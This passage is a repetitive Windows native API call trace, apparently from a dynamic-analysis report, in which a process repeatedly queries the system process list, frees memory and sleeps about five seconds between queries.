BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.744] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.760] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.775] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.790] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.806] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.823] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.854] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.870] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.885] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.901] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.916] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.931] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.948] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.964] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.993] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.008] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.026] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.040] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 